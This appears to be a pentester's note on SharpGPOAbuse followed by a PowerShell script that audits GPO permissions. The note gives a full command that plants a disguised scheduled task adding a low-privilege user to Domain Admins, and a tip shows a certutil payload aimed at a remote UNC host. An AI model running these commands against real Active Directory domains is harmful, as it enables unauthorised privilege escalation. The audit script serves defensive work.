# SharpGPOabuse
An awesome tool for abusing "GenericWrite" access to GPOs (a right you might identify after running BloodHound). Here's a sample syntax you could run:

```
SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD /DOMAIN" --GPOName "Name of GPO with Generic Write Access"
```
We talked about this tool in more detail on episode #441 of the 7 Minute Security podcast.
**Tip:** Unlike pygpoabuse, if you're running a payload like `-command "certutil -syncwithwu \\10.1.2.3"` you do not need to double-escape the UNC path with backslashes. Just `\\uncpath` will work fine.
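As an added defensive check (not part of the original post or the SharpGPOabuse project), the PowerShell below lists every GPO on which a principal outside an allow-list holds GenericWrite or another write-class right, which is exactly the condition the tool above takes advantage of. It assumes the RSAT GroupPolicy and ActiveDirectory modules are installed on a domain-joined host; the `$trustedPrincipals` allow-list is a placeholder to tune for your environment.

```powershell
# Added example: audit GPO ACLs for write-class rights held by unexpected principals.
# Assumes the RSAT GroupPolicy and ActiveDirectory modules (both real) are present.
Import-Module GroupPolicy
Import-Module ActiveDirectory

# Placeholder allow-list (assumption): principals that are expected to hold
# full control over GPOs by default. Extend it with your own GPO admin groups.
$trustedPrincipals = @(
    'Domain Admins',
    'Enterprise Admins',
    'Group Policy Creator Owners',
    'SYSTEM',
    'CREATOR OWNER'
)

# Rights that let a principal rewrite the GPO or take it over outright.
$writeRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner'

foreach ($gpo in Get-GPO -All) {
    # Get-GPO exposes the distinguished name of the groupPolicyContainer in .Path,
    # which the AD: PSDrive (loaded by the ActiveDirectory module) can read directly.
    $acl = Get-Acl -Path ("AD:\" + $gpo.Path)

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.ActiveDirectoryRights.ToString() -notmatch $writeRights) { continue }

        # Strip the DOMAIN\ prefix so the allow-list can be written without it.
        $shortName = $ace.IdentityReference.Value.Split('\')[-1]
        if ($trustedPrincipals -contains $shortName) { continue }

        [pscustomobject]@{
            GPO       = $gpo.DisplayName
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Inherited = $ace.IsInherited
        }
    }
}
```

Every row it prints is a GPO a low-privilege principal could edit; compare the list against your change records and remove rights that were not granted on purpose.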